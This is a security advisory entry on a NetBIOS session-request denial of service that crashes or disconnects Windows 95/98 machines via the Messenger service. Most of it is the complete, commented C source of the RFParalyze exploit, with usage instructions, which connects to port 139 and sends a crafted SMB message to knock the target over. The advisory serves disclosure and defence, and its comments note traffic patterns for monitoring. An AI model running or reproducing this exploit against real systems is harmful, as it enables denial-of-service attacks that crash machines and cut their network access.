COMMAND

    NetBIOS

SYSTEMS AFFECTED

    Win 95/98

PROBLEM

    Following is based  on el8.org advisory  by  Evan  Brewer and Rain
    Forest Puppy.   Through a  netbios session  request packet  with a
    NULL source name, Windows 9[5,8]  show a number of odd  responses.
    Everything from lockups, reboots  and "the blue screen  of death",
    to total loss of network  connectivity.  Note that neither  el8 nor
    wiretrip  discovered  the  vulnerability;  instead,  a binary-only
    exploit  found  in  the  wild  was reversed, and the demonstration
    code  attached  was  reconstructed.    So  it  should  be   noted:
    THIS HAS BEEN FOUND IN THE WILD.

    The  vulnerability  specifically targets  the  Messenger service on
    Windows 9[5,8].   At this  point, it's  doubtful there's  anything
    more to this than a DoS capability.  However, any information  to
    the contrary would be appreciated.

    /* 	- el8.org advisory: RFParalyze.c
    
	    code by rain forest puppy <rfp@wiretrip.net>   -
   	    coolness exhibited by Evan Brewer <dm@el8.org> -
    
	    - Usage: RFParalyze <IP address> <NetBIOS name>
    
	    where <IP address> is the IP address (duh) of the target (note:
	    not DNS name).  <NetBIOS name> is the NetBIOS name (again, duh) of
	    the server at the IP address given.  A kiddie worth his scripts
	    should be able to figure out how to lookup the NetBIOS name.
	    Note: NetBIOS name must be in upper case.
    
	    This code was made from a reverse-engineer of 'whisper', a
	    binary-only exploit found in the wild.  It's by Marcy Abene.
    
	    I have only tested this code on Linux.  Hey, at least it's
	    not in perl... ;)   -rfp
    
    */
    
    #include <stdio.h>		/* It's such a shame to waste   */
    #include <stdlib.h>		/* this usable space. Instead,  */
    #include <string.h>		/* we'll just make it more      */
    #include <netdb.h>		/* props to the men and women   */
    #include <sys/socket.h>		/* (hi Tabi!) of #!adm and      */
    #include <sys/types.h>		/* #!w00w00, because they rock  */
    #include <netinet/in.h>		/* so much.  And we can't forget*/
    #include <unistd.h>		/* our friends at eEye or       */
    #include <string.h>		/* Attrition. Oh, +hi Sioda. :) */
    
    /* 	Hard-coded SMB message sent after the session is established.
	    Layout as reconstructed from the bytes below:
	      - 4-byte NetBIOS session header (type 0x00 = session message,
	        length field 0x41 = 65; note that 68 bytes actually follow it,
	        so the advertised and real lengths disagree)
	      - "\xffSMB" signature, command byte 0xd0 (SMB_COM_SEND_MESSAGE,
	        the winpopup/Messenger-service command)
	      - data block naming "BEAV" (sender) and "BEAVIS" (receiver) and
	        the message text "yep yep"
	    The array is exactly 72 bytes (plus the string NUL), which is the
	    length main() writes to the socket.  These byte patterns
	    (\xffSMB with command 0xd0 to tcp/139) are what a network
	    monitor would key on.
    */
    char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
    "\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";
    
    /* NetBIOS session request (tcp/139) as a flat byte layout.  Every
       member is a char array, so there is no padding and sizeof == 72,
       which is the length main() writes.  The fields are filled in
       main(): first = session header (0x81 SESSION REQUEST, length
       0x44, then 0x20 = length of the encoded called name), yoname =
       32-byte first-level-encoded called name (the target), sep =
       terminator of the called name plus 0x20 length of the calling
       name, myname = 32-byte encoded calling name, end = terminator.
       The name fields are NOT NUL-terminated C strings. */
    struct sreq /* little structure of netbios session request */
            {
            char first[5];    /* session-message header, 0x81 ... */
            char yoname[32];  /* called name, 32 bytes, not NUL-terminated */
            char sep[2];      /* "\x00\x20": end of called name + next length */
            char myname[32];  /* calling name, 32 bytes, not NUL-terminated */
            char end[1];      /* "\x00" terminator of the calling name */
            };
    
    void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/
    
    /* Entry point: connects to <IP>:139, sends a NetBIOS session request
       naming <NetBIOS name> as the called name, waits for a positive
       session response (0x82), then writes the hard-coded 'blowup' SMB
       message and exits.  Return values of socket()/write()/read() are
       largely unchecked; argv[1] is parsed with inet_addr() (declared in
       <arpa/inet.h>, which this file does not include) and argv[2] is
       used as-is, which is why the usage text demands a dotted IP and an
       upper-case name. */
    int main(int argc, char *argv[]){
    char buf[4000], myname[33], yoname[33];   /* 33 = 32 encoded chars + NUL from Pad_Name */
    struct sockaddr_in sin;
    int sox, connex, x;
    struct sreq smbreq;
    
    printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");
    
    if (argc < 3) {
    printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n");
    printf("       --IP must be ip address, not dns\n");
    printf("       --NetBIOS name must be in UPPER CASE\n\n");
    exit(1);}
    
    printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");
    
    /* Calling name: "WICCA" first-level encoded, then bytes 30/31
       overwritten with "AD", which decodes to the 16th name byte 0x03
       (the Messenger-service suffix). */
    Pad_Name("WICCA",myname);  /* greetz to Simple Nomad/NMRC */
    myname[30]='A';	           /* "AD" -> 0x03 suffix byte     */
    myname[31]='D';
    
    /* Called name: argv[2] encoded the same way, same <03> suffix. */
    Pad_Name(argv[2],yoname);
    yoname[30]='A';
    yoname[31]='D';
    printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);
    
    /* inet_addr() returns INADDR_NONE on a bad address; not checked here. */
    sin.sin_addr.s_addr = inet_addr(argv[1]);
    sin.sin_family      = AF_INET;
    sin.sin_port        = htons(139);
    
    /* socket() result is not checked; a -1 here surfaces as a connect()
       failure.  The cast should be (struct sockaddr *) -- it compiles
       only because of the compatible layout. */
    sox = socket(AF_INET,SOCK_STREAM,0);
    if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
        perror("Problems connecting: ");
        exit(1);}
    
    memset(buf,0,4000);
    
    /* Assemble the 72-byte session request; see struct sreq.  strncpy
       with exactly 32 bytes deliberately leaves the name fields
       unterminated -- they are fixed-width wire fields, not C strings. */
    memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /* 0x81 SESSION REQUEST, len 0x44, name len 0x20 */
    memcpy(smbreq.sep,"\x00\x20",2);               /* end of called name, calling name len 0x20    */
    memcpy(smbreq.end,"\x00",1);                   /* end of calling name                           */
    strncpy(smbreq.myname,myname,32);
    strncpy(smbreq.yoname,yoname,32);
    
    /* write() return (short write / error) is ignored. */
    write(sox,&smbreq,72);  /* send initial request */
    x=read(sox,buf,4000);   /* get their response   */
    
    if(x<1){ printf("Problem, didn't get response\n");
            exit(1);}
    
    /* 0x82 is the NetBIOS POSITIVE SESSION RESPONSE message type. */
    if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");
    else {printf("We didn't get back the A-OK, bailing.\n");
            exit(1);}
    
    /* blowup is a char array, so &blowup has the same address as blowup;
       72 is its full length.  The reply is read and discarded. */
    write(sox,&blowup,72);  /* send the magic message >:)     */
    x=read(sox,buf,4000);   /* we really don't care, but sure */
    close(sox);
    printf("done\n");
    }
    
    void Pad_Name(char *name1, char *name2)
    { char c, c1, c2;
      int i, len;
      len = strlen(name1);
      for (i = 0; i < 16; i++) {
        if (i >= len) {
         c1 = 'C'; c2 = 'A'; /* CA is a space */
        } else {
          c = name1[i];
          c1 = (char)((int)c/16 + (int)'A');
          c2 = (char)((int)c%16 + (int)'A');
        }
        name2[i*2] = c1;
        name2[i*2+1] = c2;
      }
      name2[32] = 0;   /* Put in the null ...*/
    }

SOLUTION

    Nothing yet.